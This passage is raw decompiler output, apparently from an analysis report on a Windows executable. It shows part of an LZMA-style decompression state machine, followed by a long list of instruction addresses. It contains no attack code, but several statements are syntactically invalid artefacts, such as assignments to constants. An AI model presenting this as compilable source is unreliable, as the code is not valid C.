													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                                                                                        0x00000000
                                                                                                                        0x0040643a
                                                                                                                        0x0040643a
                                                                                                                        0x0040643e
                                                                                                                        0x00406467
                                                                                                                        0x00406471
                                                                                                                        0x00406440
                                                                                                                        0x00406449
                                                                                                                        0x00406456
                                                                                                                        0x00406459
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x004067a0
                                                                                                                        0x004067a0
                                                                                                                        0x004067a0
                                                                                                                        0x004067a6
                                                                                                                        0x004067ac
                                                                                                                        0x004067b2
                                                                                                                        0x004067cc
                                                                                                                        0x004067cf
                                                                                                                        0x004067d5
                                                                                                                        0x004067e0
                                                                                                                        0x004067e2
                                                                                                                        0x004067b4
                                                                                                                        0x004067b4
                                                                                                                        0x004067c3
                                                                                                                        0x004067c7
                                                                                                                        0x004067c7
                                                                                                                        0x004067ec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067ee
                                                                                                                        0x004067f2
                                                                                                                        0x004069a1
                                                                                                                        0x004069b7
                                                                                                                        0x004069bf
                                                                                                                        0x004069c6
                                                                                                                        0x004069c8
                                                                                                                        0x004069cf
                                                                                                                        0x004069d3
                                                                                                                        0x004069d3
                                                                                                                        0x004067fe
                                                                                                                        0x00406805
                                                                                                                        0x0040680d
                                                                                                                        0x00406810
                                                                                                                        0x00406813
                                                                                                                        0x00406813
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fbe
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4
                                                                                                                        0x00000000
                                                                                                                        0x00405fcf
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fd8
                                                                                                                        0x00405fdb
                                                                                                                        0x00405fde
                                                                                                                        0x00405fe2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fe8
                                                                                                                        0x00405feb
                                                                                                                        0x00405fed
                                                                                                                        0x00405fee
                                                                                                                        0x00405ff1
                                                                                                                        0x00405ff3
                                                                                                                        0x00405ff4
                                                                                                                        0x00405ff6
                                                                                                                        0x00405ff9
                                                                                                                        0x00405ffe
                                                                                                                        0x00406003
                                                                                                                        0x0040600c
                                                                                                                        0x0040601f
                                                                                                                        0x00406022
                                                                                                                        0x0040602e
                                                                                                                        0x00406056
                                                                                                                        0x00406058
                                                                                                                        0x00406066
                                                                                                                        0x00406066
                                                                                                                        0x0040606a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x0040605a
                                                                                                                        0x0040605d
                                                                                                                        0x0040605e
                                                                                                                        0x0040605e
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x00406034
                                                                                                                        0x00406039
                                                                                                                        0x00406039
                                                                                                                        0x00406042
                                                                                                                        0x0040604a
                                                                                                                        0x0040604d
                                                                                                                        0x00000000
                                                                                                                        0x00406053
                                                                                                                        0x00406053
                                                                                                                        0x00000000
                                                                                                                        0x00406053
                                                                                                                        0x00000000
                                                                                                                        0x00406070
                                                                                                                        0x00406070
                                                                                                                        0x00406074
                                                                                                                        0x00406920
                                                                                                                        0x00000000
                                                                                                                        0x00406920
                                                                                                                        0x0040607d
                                                                                                                        0x0040608d
                                                                                                                        0x00406090
                                                                                                                        0x00406093
                                                                                                                        0x00406093
                                                                                                                        0x00406093
                                                                                                                        0x00406096
                                                                                                                        0x0040609a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040609c
                                                                                                                        0x004060a2
                                                                                                                        0x004060cc
                                                                                                                        0x004060d2
                                                                                                                        0x004060d9
                                                                                                                        0x00000000
                                                                                                                        0x004060d9
                                                                                                                        0x004060a8
                                                                                                                        0x004060ab
                                                                                                                        0x004060b0
                                                                                                                        0x004060b0
                                                                                                                        0x004060bb
                                                                                                                        0x004060c3
                                                                                                                        0x004060c6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040610b
                                                                                                                        0x00406111
                                                                                                                        0x00406114
                                                                                                                        0x00406121
                                                                                                                        0x00406129
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004060e0
                                                                                                                        0x004060e0
                                                                                                                        0x004060e4
                                                                                                                        0x0040692f
                                                                                                                        0x00000000
                                                                                                                        0x0040692f
                                                                                                                        0x004060f0
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fe
                                                                                                                        0x00406101
                                                                                                                        0x00406104
                                                                                                                        0x00406109
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067a0
                                                                                                                        0x004067a0
                                                                                                                        0x004067a6
                                                                                                                        0x004067ac
                                                                                                                        0x004067b2
                                                                                                                        0x004067cc
                                                                                                                        0x004067cf
                                                                                                                        0x004067d5
                                                                                                                        0x004067e0
                                                                                                                        0x004067e2
                                                                                                                        0x004067b4
                                                                                                                        0x004067b4
                                                                                                                        0x004067c3
                                                                                                                        0x004067c7
                                                                                                                        0x004067c7
                                                                                                                        0x004067ec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406131
                                                                                                                        0x00406133
                                                                                                                        0x00406136
                                                                                                                        0x004061a7
                                                                                                                        0x004061aa
                                                                                                                        0x004061ad
                                                                                                                        0x004061b4
                                                                                                                        0x004061be
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00406138
                                                                                                                        0x0040613c
                                                                                                                        0x0040613f
                                                                                                                        0x00406141
                                                                                                                        0x00406144
                                                                                                                        0x00406147
                                                                                                                        0x00406149
                                                                                                                        0x0040614c
                                                                                                                        0x0040614e
                                                                                                                        0x00406153
                                                                                                                        0x00406156
                                                                                                                        0x00406159
                                                                                                                        0x0040615d
                                                                                                                        0x00406164
                                                                                                                        0x00406167
                                                                                                                        0x0040616e
                                                                                                                        0x00406172
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x0040617e
                                                                                                                        0x00406181
                                                                                                                        0x0040619f
                                                                                                                        0x004061a1
                                                                                                                        0x00000000
                                                                                                                        0x00406183
                                                                                                                        0x00406183
                                                                                                                        0x00406186
                                                                                                                        0x00406189
                                                                                                                        0x0040618c
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x00406191
                                                                                                                        0x00406194
                                                                                                                        0x00406196
                                                                                                                        0x00406197
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x004063d0
                                                                                                                        0x004063d4
                                                                                                                        0x004063f2
                                                                                                                        0x004063f5
                                                                                                                        0x004063fc
                                                                                                                        0x004063ff
                                                                                                                        0x00406402
                                                                                                                        0x00406405
                                                                                                                        0x00406408
                                                                                                                        0x0040640b
                                                                                                                        0x0040640d
                                                                                                                        0x00406414
                                                                                                                        0x00406415
                                                                                                                        0x00406417
                                                                                                                        0x0040641a
                                                                                                                        0x0040641d
                                                                                                                        0x00406420
                                                                                                                        0x00406420
                                                                                                                        0x00406425
                                                                                                                        0x00000000
                                                                                                                        0x00406425
                                                                                                                        0x004063d6
                                                                                                                        0x004063d9
                                                                                                                        0x004063dc
                                                                                                                        0x004063e6
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040647d
                                                                                                                        0x00406481
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406487
                                                                                                                        0x0040648b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406491
                                                                                                                        0x00406493
                                                                                                                        0x00406497
                                                                                                                        0x00406497
                                                                                                                        0x0040649a
                                                                                                                        0x0040649e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064ee
                                                                                                                        0x004064f2
                                                                                                                        0x004064f9
                                                                                                                        0x004064fc
                                                                                                                        0x004064ff
                                                                                                                        0x00406509
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x004064f4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406515
                                                                                                                        0x00406519
                                                                                                                        0x00406520
                                                                                                                        0x00406523
                                                                                                                        0x00406526
                                                                                                                        0x0040651b
                                                                                                                        0x0040651b
                                                                                                                        0x0040651b
                                                                                                                        0x00406529
                                                                                                                        0x0040652c
                                                                                                                        0x0040652f
                                                                                                                        0x0040652f
                                                                                                                        0x00406532
                                                                                                                        0x00406535
                                                                                                                        0x00406538
                                                                                                                        0x00406538
                                                                                                                        0x0040653b
                                                                                                                        0x00406542
                                                                                                                        0x00406547
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004065d5
                                                                                                                        0x004065d5
                                                                                                                        0x004065d9
                                                                                                                        0x00406977
                                                                                                                        0x00000000
                                                                                                                        0x00406977
                                                                                                                        0x004065df
                                                                                                                        0x004065e2
                                                                                                                        0x004065e5
                                                                                                                        0x004065e9
                                                                                                                        0x004065ec
                                                                                                                        0x004065f2
                                                                                                                        0x004065f4
                                                                                                                        0x004065f4
                                                                                                                        0x004065f4
                                                                                                                        0x004065f7
                                                                                                                        0x004065fa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004061ca
                                                                                                                        0x004061ca
                                                                                                                        0x004061ce
                                                                                                                        0x0040693b
                                                                                                                        0x00000000
                                                                                                                        0x0040693b
                                                                                                                        0x004061d4
                                                                                                                        0x004061d7
                                                                                                                        0x004061da
                                                                                                                        0x004061de
                                                                                                                        0x004061e1
                                                                                                                        0x004061e7
                                                                                                                        0x004061e9
                                                                                                                        0x004061e9
                                                                                                                        0x004061e9
                                                                                                                        0x004061ec
                                                                                                                        0x004061ef
                                                                                                                        0x004061ef
                                                                                                                        0x004061f2
                                                                                                                        0x004061f5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004061fb
                                                                                                                        0x00406201
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406207
                                                                                                                        0x00406207
                                                                                                                        0x0040620b
                                                                                                                        0x0040620e
                                                                                                                        0x00406211
                                                                                                                        0x00406214
                                                                                                                        0x00406217
                                                                                                                        0x00406218
                                                                                                                        0x0040621b
                                                                                                                        0x0040621d
                                                                                                                        0x00406223
                                                                                                                        0x00406226
                                                                                                                        0x00406229
                                                                                                                        0x0040622c
                                                                                                                        0x0040622f
                                                                                                                        0x00406232
                                                                                                                        0x00406235
                                                                                                                        0x00406251
                                                                                                                        0x00406254
                                                                                                                        0x00406257
                                                                                                                        0x0040625a
                                                                                                                        0x00406261
                                                                                                                        0x00406265
                                                                                                                        0x00406267
                                                                                                                        0x0040626b
                                                                                                                        0x00406237
                                                                                                                        0x00406237
                                                                                                                        0x0040623b
                                                                                                                        0x00406243
                                                                                                                        0x00406248
                                                                                                                        0x0040624a
                                                                                                                        0x0040624c
                                                                                                                        0x0040624c
                                                                                                                        0x0040626e
                                                                                                                        0x00406275
                                                                                                                        0x00406278
                                                                                                                        0x00000000
                                                                                                                        0x0040627e
                                                                                                                        0x00000000
                                                                                                                        0x0040627e
                                                                                                                        0x00000000
                                                                                                                        0x00406283
                                                                                                                        0x00406283
                                                                                                                        0x00406287
                                                                                                                        0x00406947
                                                                                                                        0x00000000
                                                                                                                        0x00406947
                                                                                                                        0x0040628d
                                                                                                                        0x00406290
                                                                                                                        0x00406293
                                                                                                                        0x00406297
                                                                                                                        0x0040629a
                                                                                                                        0x004062a0
                                                                                                                        0x004062a2
                                                                                                                        0x004062a2
                                                                                                                        0x004062a2
                                                                                                                        0x004062a5
                                                                                                                        0x004062a8
                                                                                                                        0x004062a8
                                                                                                                        0x004062a8
                                                                                                                        0x004062ae
                                                                                                                        0x00000000
